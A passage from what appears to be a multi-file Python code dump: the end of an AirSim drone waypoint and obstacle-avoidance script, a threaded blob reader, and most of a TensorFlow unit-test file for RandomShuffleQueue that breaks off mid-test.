print(">> Defuzzy data: vx= {:.2f}, vy= {:.2f}, vz= {:.2f}, turn_yaw= {:.2f}".format(vx, vy, vz, turn_yaw))
attitude = get_attitude()
client.moveByVelocityAsync(vx=0, vy=0, vz=0, duration=0.5, drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom, yaw_mode=airsim.YawMode(False, attitude[2]+turn_yaw))
if tag_time < 3:
GPS_prime = frd2ned_in_velocity(theta=turn_yaw, v_front=GPS[0], v_right=GPS[1])
GPS = get_position()
Heading = yawDegree(GPS,GPS_prime)
client.moveToPositionAsync(GPS_prime[0], GPS_prime[1], GPS[2], velocity=speed, yaw_mode=airsim.YawMode(False, Heading))
#attitude = get_attitude()
#V = frd2ned_in_velocity(theta=-attitude[2], v_front=1, v_right=0)
cv2.putText(img=depth, text='{:.2f} cm'.format(ROI_M[M_i,M_j]), org=((center_M[0]-50), (center_L[1]+200)), fontFace=cv2.QT_FONT_BLACK, color=(255, 255, 0), fontScale=1, thickness=1)
cv2.circle(depth, (M_j+(center_M[0]-eq_w),M_i+(center_M[1]-shift)), 4, (255, 255, 0), -1)
else:
tag_time = 0
GPS = get_position()
Heading = yawDegree(GPS, wp[wp_i])
cv2.putText(img=depth, text='safe', org=((center_M[0]-50), (center_M[1]+200)), fontFace=cv2.FONT_HERSHEY_COMPLEX, color=(255, 255, 0), fontScale=1, thickness=1)
client.moveToPositionAsync(wp[wp_i][0], wp[wp_i][1], wp[wp_i][2], velocity=speed, yaw_mode=airsim.YawMode(False, Heading))
dist_to_waypoint = round((round((GPS[0] - wp[wp_i][0]),3)**2 + round((GPS[1] - wp[wp_i][1]),3)**2),3)**0.5
# Check if reach the waypoint(x,y)
if dist_to_waypoint <= 1:
stop()
print(">> Arrived at wp{Nwp:}({x:}, {y:}, {z:})!".format(Nwp=wp_i+1, x=GPS[0], y=GPS[1], z=GPS[2]))
if wp_i >= len(wp) -1:
print('\n ==== Mission Complete ! ====')
Turn_Yaw(0)
print(">> LAND")
client.landAsync().join()
client.armDisarm(False)
cv2.destroyAllWindows()
break
wp_i += 1
Heading = yawDegree(GPS, wp[wp_i])
Turn_Yaw(Heading)
cv2.putText(img=depth, text='Pos[x,y,z]: [{:.1f}, {:.1f}, {:.1f}]'.format(GPS[0],GPS[1],GPS[2]), org=(10, 18), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.putText(img=depth, text='V_global[x,y,z]: [{:.1f}, {:.1f}, {:.1f}]'.format(V_global[0],V_global[1],V_global[2]), org=(10, 40), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.putText(img=depth, text='way_point: {}/{}, dist2waypoint: {:.2f} m'.format(wp_i+1, len(wp), dist_to_waypoint), org=(10, 60), fontFace=cv2.FONT_HERSHEY_SIMPLEX, color=(0, 0, 0), fontScale=0.5, thickness=1)
cv2.rectangle(depth, ((center_M[0]-eq_w), (center_M[1]-shift)), ((center_M[0]+eq_w), (center_M[1]+shift)), (255, 255, 0), 2)
cv2.imshow('depth',depth)
#cv2.imshow("color", imgcolor)
key = cv2.waitKey(1) & 0xFF
if key == 27 or key == ord('q'):
cv2.destroyAllWindows()
break
#print('time:{:.2f} sec'.format(timeit.default_timer()-t))
except Exception as e:
print(e)
client.reset()
finally:
cv2.destroyAllWindows()
client.reset()
|
threaded_reader.py
|
import queue
import threading
from ...formats import dictset
def threaded_reader(items_to_read: list, blob_list, reader):
"""
Speed up reading sets of files - such as multiple days worth of log-per-day
files.
Each file is read in a separate thread, up to 8 threads, reading a single
file using this function won't show any improvement.
NOTE:
This compromises record ordering to achieve speed increases
Parameters:
items_to_read: list of strings
The name of the blobs to read
reader: Reader
The Reader object to perform the reading operations
Yields:
dictionary (or string)
"""
thread_pool = []
def _thread_process():
"""
The process inside the threads.
1) Get any files off the file queue
2) Read the file in chunks
3) Put a chunk onto a reply queue
"""
try:
source = source_queue.pop(0)
except IndexError:
source = None
while source:
source_reader = reader._read_blob(source, blob_list)
for chunk in dictset.page_dictset(source_reader, 256):
reply_queue.put(chunk) # this will wait until there's a slot
try:
source = source_queue.pop(0)
except IndexError:
source = None
source_queue = items_to_read.copy()
# scale the number of threads, if we have more than the number of files
# we're reading, will have threads that never complete
t = min(len(source_queue), reader.thread_count, 8)
reply_queue: queue.Queue = queue.Queue(t * 8)
# start the threads
for _ in range(t):
thread = threading.Thread(target=_thread_process)
thread.daemon = True
thread.start()
thread_pool.append(thread)
# when the threads are all complete and all the records have been read from
# the reply queue, we're done
while any([t.is_alive() for t in thread_pool]) or not (reply_queue.empty()):
try:
# don't wait forever
records = reply_queue.get(timeout=10)
yield from records
except queue.Empty: # pragma: no cover
pass # most likely reason get being here is a race condition
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size())
enqueue_op.run()
self.assertAllEqual(1, q.size())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
